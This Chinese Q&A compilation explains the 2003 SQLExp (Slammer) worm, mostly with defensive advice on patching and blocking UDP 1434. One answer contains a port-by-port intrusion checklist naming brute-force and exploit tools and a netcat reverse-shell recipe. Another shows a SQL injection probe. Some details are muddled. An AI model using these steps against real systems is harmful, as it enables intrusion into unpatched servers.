sqlexp
㈠ 为什么我的电脑老是被sqlExp攻击
SQLExp攻击是“蠕虫王”蠕虫文档:
病毒名称:Worm.SQLexp.376
危险级别:中
破坏性:中
传播速度:高
病毒特征:该蠕虫攻击安装有Microsoft
SQL
的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft
SQL开放端口。该端口在未打补丁的SQL
Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。
病毒查杀防护
1,直接下载微软指定的补丁程序
或者
安装Microsoft
SQL
Server
2000
SP3。
2,在防火墙或者路由器上阻塞外部对内的和内部对外的UDP/1434端口的访问。
3,如果由于DoS导致系统反映慢,可先断开连接,然后在Windows任务管理器里强行终止进程SqlServr.exe,打上相应补丁并重新启动服务.
不必去微软官方网下载,太麻烦了。
建议您下载个“骑虎360安全卫士”。
其中有下载补丁的功能,还能伴您查杀恶意软件和流行木马。
非常好用!
㈡ 怎样防止sqlexp病毒
SQLExp攻击是什么攻击?
“蠕虫王”蠕虫文档:
病毒名称:Worm.SQLexp.376
危险级别:中
破坏性:中
传播速度:高
病毒特征:该蠕虫攻击安装有Microsoft SQL 的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。
病毒查杀防护
1,直接下载微软指定的补丁程序 或者 安装Microsoft SQL Server 2000 SP3。
2,在防火墙或者路由器上阻塞外部对内的和内部对外的UDP/1434端口的访问。
3,如果由于DoS导致系统反映慢,可先断开连接,然后在Windows任务管理器里强行终止进程SqlServr.exe,打上相应补丁并重新启动服务.
㈢ 怎样应对SQLExp攻击
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放, 黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 端口 协议 应用程序 21 TCP FTP 25 TCP SMTP 53 TCP DNS 80 TCP HTTP SERVER 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 6(非端口) IP协议 8(非端口) IP协议 将下面的端口关闭 TCP 21 22 23 25 TCP SMTP 53 TCP DNS 80 135 epmap 138 [冲击波] 139 smb 445 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b 1026 DCE/12345778-1234-abcd-ef00-0123456789ac 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 3389 4444[冲击波] 4489 UDP 67[冲击波] 137 netbios-ns 161 An SNMP Agent is running/ Default community names of the SNMP Agent 端口入侵: 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
㈣ 什么叫SQLEXP攻击啊
据说
这是一个很老的病毒了,名字叫蠕虫王(SQLexp)。
传播方式:内存驻留,无文件实体。
破坏性:耗尽系统资源,造成拒绝服务式攻击,瘫痪整个网络。
受攻击范围:与感染主机同子网的所有机器。
传播速度:使用广播数据包一次攻击255台机器,极快。
传播到全球范围所费时间:五小时内
蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器
也就是说明无论系统是否有SQL它都会攻击的。
我记得这个病毒好象对没有SQL的计算机只是做个“挂接”有点象医学上小肠子里的蛔虫挂在繁殖,计算机就是挂你计算机的后门端口去攻击其他计算机。
㈤ sql注入的exp是什么意思
Exp(exploit) 指实际利用漏洞的例子
一般比poc(proof of concept)更..实际点
㈥ 急急急~~电脑高手进.SQLExp病毒是怎么回事
SQLEXP是“蠕虫王”
“蠕虫王”蠕虫文档:
病毒名称:Worm.SQLexp.376
危险级别:中
破坏性:中
传播速度:高
病毒特征:蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。该蠕虫攻击安装有Microsoft SQL 的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。由于蠕虫王并不对是否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机器因瘫痪而停止服务,危害极为惊人。
历来以对数据保护完整性着称的SQL Server数据库居然也存在漏洞,并被黑客利用,这大大出乎人们的意料之外。2003年1月25日爆发的Win32.SQLExp.Worm蠕虫病毒带给我们的启示是多方面的。归根结底,这又是一次由微软系统的漏洞引发的互联网危机。
趋势科技总裁张明正先生曾经预言:全球每18个月就会有一种影响巨大的恶性病毒发生。2003年1月25日爆发的影响全球80%网民上网的Win32.SQLExp.Worm蠕虫病毒,相距2001年7月份给全球信息系统带来深重灾难、并从此改写病毒发展历史的红色代码和Nimda病毒,正好整整18个月!
SQLExp曾经导致中国网络在2003年大面积瘫痪,专杀工具没什么,打好补丁就可以了。
相关的微软补丁下载地址为:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602
㈦ 金山网镖拦截针对本机的SQLExp攻击是什么意思
是扫描~~~~
现在的入侵都是批量式入侵,没有谁会跟一台电脑过不去,大家基本上都是开着扫描器扫描一个地区的网络,从中挑选可以入侵的计算机,所以你不用担心,这种所谓的“攻击”ZA防火墙一天可以拦截上万次。
你的金山拦截的是针对SQL这款数据库管理软件的扫描,也就是1433端口扫描,你安装了防火墙,如果你没有安装SQL的话肯定没问题。放心吧~~~
㈧ SQLExp攻击
SQLExp攻击
即利用 构造的sql语句进行攻击/溢出,常见的方式有:穷举,暴库 等等。都是利用sql的部分敏感语句过滤不严格造成的。
假如你装了sql 并开了1433,就可以通过命令:sql.exe 你的IP
如果成功溢出的话,会反回一个shell,就像在你的电脑里使用cmd 里的操作一样!
穷举法例如:http://**************************code=1and1=1或者or 1=1
因为1=1永远成立 返回正常页面和不正常页面的差别就可以判断code是不是=1
这是非常笨的方法 但是原理一样。(详细步骤不便在此讲明)
至于你所说的 你如果是PC的话,没什么事,那只是黑客进行大范围扫描,偶尔扫过你的机器而已。但是你要是服务器的话就小心了